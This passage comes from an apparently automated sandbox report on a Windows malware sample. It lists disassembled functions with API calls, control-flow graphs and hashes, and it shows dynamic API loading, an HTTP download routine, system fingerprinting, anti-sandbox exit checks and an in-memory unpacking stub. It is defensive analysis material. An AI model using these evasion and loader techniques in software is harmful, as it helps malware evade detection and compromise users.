                                                      • GetProcAddress.KERNEL32(6F070000,02D645E8), ref: 004272AC
                                                      • GetProcAddress.KERNEL32(6F070000,02D64608), ref: 004272C4
                                                      • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 004272DB
                                                      • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 004272F2
                                                      • GetProcAddress.KERNEL32(75AF0000,02D8DAB8), ref: 0042730E
                                                      • GetProcAddress.KERNEL32(75AF0000,02D8A620), ref: 00427326
                                                      • GetProcAddress.KERNEL32(75AF0000,02D8DBA8), ref: 0042733F
                                                      • GetProcAddress.KERNEL32(75AF0000,02D8DBD8), ref: 00427357
                                                      • GetProcAddress.KERNEL32(75D90000,02D64708), ref: 00427373
                                                      • GetProcAddress.KERNEL32(6C390000,02D8DA88), ref: 0042738F
                                                      • GetProcAddress.KERNEL32(6C390000,02D64688), ref: 004273A7
                                                      • GetProcAddress.KERNEL32(6C390000,02D8DBC0), ref: 004273C0
                                                      • GetProcAddress.KERNEL32(6C390000,02D8DC50), ref: 004273D8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                                      • API String ID: 2238633743-3468015613
                                                      • Opcode ID: 2883cf5092a06c1f654f1ea880dfa72b03916e22f0cb699bb160642ada8bd00a
                                                      • Instruction ID: a2e4a68e25a8a5b5ebc6ca9ee8fb4e22e77819d7a8dd759769c50ea34b46318c
                                                      • Opcode Fuzzy Hash: 2883cf5092a06c1f654f1ea880dfa72b03916e22f0cb699bb160642ada8bd00a
                                                      • Instruction Fuzzy Hash: E8625EB9A103009FD758DF65ED88AA637BBF789345310A91DF95683364DBB4A800DFB0
                                                      Function 0041F390 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenA.KERNEL32(0042CFF4,00000001,00000000,00000000), ref: 0041F3B5
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0041F3D1
                                                      • lstrlenA.KERNEL32(0042CFF4), ref: 0041F3DC
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0041F3F5
                                                      • lstrlenA.KERNEL32(0042CFF4), ref: 0041F400
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0041F419
                                                      • lstrcpy.KERNEL32(00000000,00434FA8), ref: 0041F43E
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0041F46C
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0041F4A0
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0041F4D0
                                                      • lstrlenA.KERNEL32(02D642A8), ref: 0041F4F5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrlen
                                                      • String ID: ERROR
                                                      • API String ID: 367037083-2861137601
                                                      • Opcode ID: 7bb9ec8cb7988eb5376eba1d8a9decf42e168c53a9f499b45cb3e65abfe95c36
                                                      • Instruction ID: e79e8e12b522000fb01356b963eb89dc5d1fae4d3c1270e08a4c38bee3a94f7d
                                                      • Opcode Fuzzy Hash: 7bb9ec8cb7988eb5376eba1d8a9decf42e168c53a9f499b45cb3e65abfe95c36
                                                      • Instruction Fuzzy Hash: 4EA24270A012059FDB20DF69D948A9AB7F5AF44314F18807BE409E73A1DB79DC86CF94
                                                      Function 00418DF0 Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 174stringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1568 418df0-418e14 StrCmpCA 1569 418e16-418e17 ExitProcess 1568->1569 1570 418e1d-418e36 strtok_s 1568->1570 1571 419032-41903f call 402a20 1570->1571 1572 418e3c-418e41 1570->1572 1574 418e46-418e49 1572->1574 1576 419013-41902c strtok_s 1574->1576 1577 418e4f 1574->1577 1576->1571 1591 418e43 1576->1591 1578 418e80-418e8f lstrlenA 1577->1578 1579 418fa6-418fb4 StrCmpCA 1577->1579 1580 418eaa-418eb9 lstrlenA 1577->1580 1581 418f0d-418f1b StrCmpCA 1577->1581 1582 418f2d-418f3b StrCmpCA 1577->1582 1583 418f4d-418f5b StrCmpCA 1577->1583 1584 418f6d-418f7b StrCmpCA 1577->1584 1585 418f8d-418f9b StrCmpCA 1577->1585 1586 418ed4-418ee2 StrCmpCA 1577->1586 1587 418ef4-418f08 StrCmpCA 1577->1587 1588 418e56-418e65 lstrlenA 1577->1588 1589 418fd8-418fea lstrlenA 1577->1589 1590 418fbf-418fcd StrCmpCA 1577->1590 1604 418e91-418e96 call 402a20 1578->1604 1605 418e99-418ea5 call 402930 1578->1605 1579->1576 1600 418fb6-418fbd 1579->1600 1606 418ec3-418ecf call 402930 1580->1606 1607 418ebb-418ec0 call 402a20 1580->1607 1581->1576 1593 418f21-418f28 1581->1593 1582->1576 1594 418f41-418f48 1582->1594 1583->1576 1595 418f61-418f68 1583->1595 1584->1576 1596 418f81-418f88 1584->1596 1585->1576 1597 418f9d-418fa4 1585->1597 1586->1576 1592 418ee8-418eef 1586->1592 1587->1576 1598 418e67-418e6c call 402a20 1588->1598 1599 418e6f-418e7b call 402930 1588->1599 1602 418ff4-419000 call 402930 1589->1602 1603 418fec-418ff1 call 402a20 1589->1603 1590->1576 1601 418fcf-418fd6 1590->1601 1591->1574 1592->1576 1593->1576 1594->1576 1595->1576 1596->1576 1597->1576 1598->1599 1624 419003-419005 1599->1624 1600->1576 1601->1576 1602->1624 1603->1602 1604->1605 1605->1624 1606->1624 1607->1606 1624->1576 1625 419007-419009 1624->1625 1625->1576 1626 41900b-41900d lstrcpy 1625->1626 1626->1576
                                                      APIs
                                                      • StrCmpCA.SHLWAPI(?,block,?,00000000,?,?,0042096B), ref: 00418E0A
                                                      • ExitProcess.KERNEL32 ref: 00418E17
                                                      • strtok_s.MSVCRT ref: 00418E29
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcessstrtok_s
                                                      • String ID: block$kB
                                                      • API String ID: 3407564107-744917121
                                                      • Opcode ID: 6bd58d9afb73d5a7048049b41106c175e40a97ae5f0ec1e245304fe306c35237
                                                      • Instruction ID: fb7e9155fc7545712b151cd147d482ed904e3f326781a11606bfbfbd5630716b
                                                      • Opcode Fuzzy Hash: 6bd58d9afb73d5a7048049b41106c175e40a97ae5f0ec1e245304fe306c35237
                                                      • Instruction Fuzzy Hash: 26516C70A04701DFC7319F75DD88AAB7BF4AB48704B20582EE442D7650DBBCE9819F69
                                                      Function 00406C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1627 406c40-406c64 call 402930 1630 406c75-406c97 call 404bc0 1627->1630 1631 406c66-406c6b 1627->1631 1635 406c99 1630->1635 1636 406caa-406cba call 402930 1630->1636 1631->1630 1632 406c6d-406c6f lstrcpy 1631->1632 1632->1630 1637 406ca0-406ca8 1635->1637 1640 406cc8-406cf5 InternetOpenA StrCmpCA 1636->1640 1641 406cbc-406cc2 lstrcpy 1636->1641 1637->1636 1637->1637 1642 406cf7 1640->1642 1643 406cfa-406cfc 1640->1643 1641->1640 1642->1643 1644 406d02-406d22 InternetConnectA 1643->1644 1645 406ea8-406ebb call 402930 1643->1645 1646 406ea1-406ea2 InternetCloseHandle 1644->1646 1647 406d28-406d5d HttpOpenRequestA 1644->1647 1654 406ec9-406ee0 call 402a20 * 2 1645->1654 1655 406ebd-406ebf 1645->1655 1646->1645 1649 406d63-406d65 1647->1649 1650 406e94-406e9e InternetCloseHandle 1647->1650 1652 406d67-406d77 InternetSetOptionA 1649->1652 1653 406d7d-406dad HttpSendRequestA HttpQueryInfoA 1649->1653 1650->1646 1652->1653 1658 406dd4-406de4 call 423f60 1653->1658 1659 406daf-406dd3 call 4273f0 call 402a20 * 2 1653->1659 1655->1654 1656 406ec1-406ec3 lstrcpy 1655->1656 1656->1654 1658->1659 1668 406de6-406de8 1658->1668 1670 406e8d-406e8e InternetCloseHandle 1668->1670 1671 406dee-406e07 InternetReadFile 1668->1671 1670->1650 1671->1670 1673 406e0d 1671->1673 1675 406e10-406e15 1673->1675 1675->1670 1676 406e17-406e3d call 427520 1675->1676 1679 406e44-406e51 call 402930 1676->1679 1680 406e3f call 402a20 1676->1680 1684 406e61-406e8b call 402a20 InternetReadFile 1679->1684 1685 406e53-406e57 1679->1685 1680->1679 1684->1670 1684->1675 1685->1684 1686 406e59-406e5b lstrcpy 1685->1686 1686->1684
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00406C6F
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00406CC2
                                                      • InternetOpenA.WININET(0042CFF4,00000001,00000000,00000000,00000000), ref: 00406CD5
                                                      • StrCmpCA.SHLWAPI(?,02D8F9D0), ref: 00406CED
                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406D15
                                                      • HttpOpenRequestA.WININET(00000000,GET,?,02D8F0D0,00000000,00000000,-00400100,00000000), ref: 00406D50
                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406D77
                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406D86
                                                      • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406DA5
                                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00406DFF
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00406E5B
                                                      • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00406E7D
                                                      • InternetCloseHandle.WININET(00000000), ref: 00406E8E
                                                      • InternetCloseHandle.WININET(?), ref: 00406E98
                                                      • InternetCloseHandle.WININET(00000000), ref: 00406EA2
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00406EC3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                                      • String ID: ERROR$GET
                                                      • API String ID: 3687753495-3591763792
                                                      • Opcode ID: 67ee71012cb14109d988e1c8478ae4d4d29fdfc9c3cce4a492d2a323f489cf07
                                                      • Instruction ID: 8a907297e25ef71cd4293b5d859979f41ab2109233d0e0d0d40ab909daed6b9d
                                                      • Opcode Fuzzy Hash: 67ee71012cb14109d988e1c8478ae4d4d29fdfc9c3cce4a492d2a323f489cf07
                                                      • Instruction Fuzzy Hash: 3A816F71B01315ABEB20DFA4DC89BAF77B5AF44700F154069F905B72C0DBB8AD058BA8
                                                      Function 00422910 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 93memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1689 422910-422953 GetWindowsDirectoryA 1690 422955 1689->1690 1691 42295c-4229ba GetVolumeInformationA 1689->1691 1690->1691 1692 4229bc-4229c2 1691->1692 1693 4229c4-4229d7 1692->1693 1694 4229d9-4229f0 GetProcessHeap HeapAlloc 1692->1694 1693->1692 1695 4229f2-4229f4 1694->1695 1696 4229f6-422a14 wsprintfA 1694->1696 1697 422a2b-422a42 call 4273f0 1695->1697 1696->1697
                                                      APIs
                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,?,02D8A440,00000000), ref: 0042294B
                                                      • GetVolumeInformationA.KERNEL32(0042A650,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 0042297C
                                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004229DF
                                                      • HeapAlloc.KERNEL32(00000000), ref: 004229E6
                                                      • wsprintfA.USER32 ref: 00422A0B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowswsprintf
                                                      • String ID: -B$:\$C
                                                      • API String ID: 1325379522-1437955
                                                      • Opcode ID: 013d7a5abd80eb44982cec66597c927420344f608520c3a884e76de014233dcd
                                                      • Instruction ID: 562ad2215438343aebe80b64a3c577c541e91a378324e6c4921a498218fa886a
                                                      • Opcode Fuzzy Hash: 013d7a5abd80eb44982cec66597c927420344f608520c3a884e76de014233dcd
                                                      • Instruction Fuzzy Hash: D331A5B1E08219AFC714DFB89A44AEFBFB8EB18340F00016AE505E7650E2748A408BA5
                                                      Function 02C7003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1761 2c7003c-2c70047 1762 2c7004c-2c70263 call 2c70a3f call 2c70e0f call 2c70d90 VirtualAlloc 1761->1762 1763 2c70049 1761->1763 1778 2c70265-2c70289 call 2c70a69 1762->1778 1779 2c7028b-2c70292 1762->1779 1763->1762 1784 2c702ce-2c703c2 VirtualProtect call 2c70cce call 2c70ce7 1778->1784 1780 2c702a1-2c702b0 1779->1780 1783 2c702b2-2c702cc 1780->1783 1780->1784 1783->1780 1790 2c703d1-2c703e0 1784->1790 1791 2c703e2-2c70437 call 2c70ce7 1790->1791 1792 2c70439-2c704b8 VirtualFree 1790->1792 1791->1790 1793 2c705f4-2c705fe 1792->1793 1794 2c704be-2c704cd 1792->1794 1797 2c70604-2c7060d 1793->1797 1798 2c7077f-2c70789 1793->1798 1796 2c704d3-2c704dd 1794->1796 1796->1793 1800 2c704e3-2c70505 1796->1800 1797->1798 1803 2c70613-2c70637 1797->1803 1801 2c707a6-2c707b0 1798->1801 1802 2c7078b-2c707a3 1798->1802 1812 2c70517-2c70520 1800->1812 1813 2c70507-2c70515 1800->1813 1805 2c707b6-2c707cb 1801->1805 1806 2c7086e-2c708be LoadLibraryA 1801->1806 1802->1801 1807 2c7063e-2c70648 1803->1807 1809 2c707d2-2c707d5 1805->1809 1811 2c708c7-2c708f9 1806->1811 1807->1798 1810 2c7064e-2c7065a 1807->1810 1814 2c707d7-2c707e0 1809->1814 1815 2c70824-2c70833 1809->1815 1810->1798 1816 2c70660-2c7066a 1810->1816 1817 2c70902-2c7091d 1811->1817 1818 2c708fb-2c70901 1811->1818 1819 2c70526-2c70547 1812->1819 1813->1819 1820 2c707e4-2c70822 1814->1820 1821 2c707e2 1814->1821 1823 2c70839-2c7083c 1815->1823 1822 2c7067a-2c70689 1816->1822 1818->1817 1824 2c7054d-2c70550 1819->1824 1820->1809 1821->1815 1825 2c70750-2c7077a 1822->1825 1826 2c7068f-2c706b2 1822->1826 1823->1806 1827 2c7083e-2c70847 1823->1827 1829 2c70556-2c7056b 1824->1829 1830 2c705e0-2c705ef 1824->1830 1825->1807 1831 2c706b4-2c706ed 1826->1831 1832 2c706ef-2c706fc 1826->1832 1833 2c7084b-2c7086c 1827->1833 1834 2c70849 1827->1834 1835 2c7056f-2c7057a 1829->1835 1836 2c7056d 1829->1836 1830->1796 1831->1832 1837 2c706fe-2c70748 1832->1837 1838 2c7074b 1832->1838 1833->1823 1834->1806 1841 2c7057c-2c70599 1835->1841 1842 2c7059b-2c705bb 1835->1842 1836->1830 1837->1838 1838->1822 1845 2c705bd-2c705db 1841->1845 1842->1845 1845->1824
                                                      APIs
                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02C7024D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID: cess$kernel32.dll
                                                      • API String ID: 4275171209-1230238691
                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                      • Instruction ID: 2578528d95e296f0f130f97727f7e8a4b4dd266050c786927ed7d4256d07e6d4
                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                      • Instruction Fuzzy Hash: 97526975A01229DFDB64CF68C985BACBBB1BF09304F1480D9E94DAB351DB30AA85DF14
                                                      Function 00404BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1846 404bc0-404bce 1847 404bd0-404bd5 1846->1847 1847->1847 1848 404bd7-404c48 ??2@YAPAXI@Z * 3 lstrlenA InternetCrackUrlA call 402a20 1847->1848
                                                      APIs
                                                      • ??2@YAPAXI@Z.MSVCRT(00000800,02D8A4E0), ref: 00404BF7
                                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404C01
                                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404C0B
                                                      • lstrlenA.KERNEL32(?,00000000,?), ref: 00404C1F
                                                      • InternetCrackUrlA.WININET(?,00000000), ref: 00404C27
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??2@$CrackInternetlstrlen
                                                      • String ID: <
                                                      • API String ID: 1683549937-4251816714
                                                      • Opcode ID: 285894264c2d7e9187e750985268b8b3b2c891db7afd2989fead038aed9c22b4
                                                      • Instruction ID: 1bd60353331dbecd9a7383d9733d23d0053dd466cc4828cfdfd0774d9622719e
                                                      • Opcode Fuzzy Hash: 285894264c2d7e9187e750985268b8b3b2c891db7afd2989fead038aed9c22b4
                                                      • Instruction Fuzzy Hash: D8012D71D00218AFDB10DFA9EC45B9EBBB8EB48364F00412AF914E7390EB7459058FD4
                                                      Function 00401030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1851 401030-401055 GetCurrentProcess VirtualAllocExNuma 1852 401057-401058 ExitProcess 1851->1852 1853 40105e-40107b VirtualAlloc 1851->1853 1854 401082-401088 1853->1854 1855 40107d-401080 1853->1855 1856 4010b1-4010b6 1854->1856 1857 40108a-4010ab VirtualFree 1854->1857 1855->1854 1857->1856
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,00000000,00000000,?,?,00421E5A), ref: 00401046
                                                      • VirtualAllocExNuma.KERNEL32(00000000,?,?,00421E5A), ref: 0040104D
                                                      • ExitProcess.KERNEL32 ref: 00401058
                                                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,00421E5A), ref: 0040106C
                                                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,?,?,00421E5A), ref: 004010AB
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                                      • String ID:
                                                      • API String ID: 3477276466-0
                                                      • Opcode ID: eebbf2a7d8a8f00017b338c7aa3164428bececb1a666839850d6e3d3436eabea
                                                      • Instruction ID: aa33e4c314b55322e5f005f032d3d73aad5dab283e8b13059c6bb542b9569755
                                                      • Opcode Fuzzy Hash: eebbf2a7d8a8f00017b338c7aa3164428bececb1a666839850d6e3d3436eabea
                                                      • Instruction Fuzzy Hash: 5E0144713403047BE7240A656C1AF6B77AEA781B01F209029F744F33D0DAB1EA008AB8
                                                      Function 0041F070 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1858 41f070-41f095 call 402930 1861 41f097-41f09f 1858->1861 1862 41f0a9-41f0ad call 406c40 1858->1862 1861->1862 1863 41f0a1-41f0a3 lstrcpy 1861->1863 1865 41f0b2-41f0c8 StrCmpCA 1862->1865 1863->1862 1866 41f0f1-41f0f8 call 402a20 1865->1866 1867 41f0ca-41f0e2 call 402a20 call 402930 1865->1867 1873 41f100-41f108 1866->1873 1876 41f125-41f180 call 402a20 * 10 1867->1876 1877 41f0e4-41f0ec 1867->1877 1873->1873 1875 41f10a-41f117 call 402930 1873->1875 1875->1876 1884 41f119 1875->1884 1877->1876 1879 41f0ee-41f0ef 1877->1879 1883 41f11e-41f11f lstrcpy 1879->1883 1883->1876 1884->1883
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 0041F0A3
                                                      • StrCmpCA.SHLWAPI(?,ERROR,?,?,?,?,?,?,?,?,?,0041F5C8), ref: 0041F0BE
                                                      • lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F11F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID: ERROR
                                                      • API String ID: 3722407311-2861137601
                                                      • Opcode ID: e2c20483307cdc97fa64b1e63de679ed1099f7a5a128cf85c2fdf253d432bab4
                                                      • Instruction ID: 2f8a9757f64988c9f480c6ae0c275d0c92c3e801e747b2960019797ab098cc34
                                                      • Opcode Fuzzy Hash: e2c20483307cdc97fa64b1e63de679ed1099f7a5a128cf85c2fdf253d432bab4
                                                      • Instruction Fuzzy Hash: 152137707101069BCB21FF79DD4969B37A4AF54304F10543AB84AEB2D2DE78DC598B98
                                                      Function 004010C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1903 4010c0-4010cb 1904 4010d0-4010dc 1903->1904 1906 4010de-4010f3 GlobalMemoryStatusEx 1904->1906 1907 401112-401114 ExitProcess 1906->1907 1908 4010f5-401106 1906->1908 1909 401108 1908->1909 1910 40111a-40111d 1908->1910 1909->1907 1911 40110a-401110 1909->1911 1911->1907 1911->1910
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitGlobalMemoryProcessStatus
                                                      • String ID: @
                                                      • API String ID: 803317263-2766056989
                                                      • Opcode ID: f127fba7727a91b88187df4bdea323de0718f2841fffded282c9bdb05d23b48c
                                                      • Instruction ID: 822a68ba0681b22967503a2222785f0e102d58cfae2bd9798b899adfc8918474
